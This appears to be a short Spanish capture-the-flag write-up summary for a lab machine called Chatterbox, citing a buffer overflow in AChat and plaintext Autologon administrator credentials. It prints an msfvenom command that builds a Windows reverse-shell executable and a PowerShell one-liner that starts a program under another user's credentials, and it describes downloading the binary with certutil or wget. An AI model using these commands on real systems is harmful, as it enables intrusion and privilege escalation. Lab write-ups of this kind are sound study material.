xerosec
Buscar
K

Chatterbox

Resumen de la resolución

  • Software AChat vulnerable a BOF expuesto en la máquina víctima
  • Credenciales de administrador almacenadas en texto plano debido a la función Autologon Passwords de Windows

Habilidades adquiridas

  • Además de usar impacket-psexec para conseguir una shell en la máquina víctima si se pueden subir archivos por SMB también se puede crear un binario malicioso con MSFVenom y subirlo a la máquina comprometida mediante otros métodos. Por ejemplo: levantando un servidor http en nuestra máquina de atacante y descargando el binario con certutil o wget.

Comandos y herramientas destacables

#Creación de binario malicioso
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > privesc.exe
#Ejecución de un programa como otro usuario en Powershell
powershell -c "$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('<USER>', $password);Start-Process -FilePath "<PROGRAM.EXE>" -Credential $creds"

Walkthrough en YouTube:

Última actualización 1mo ago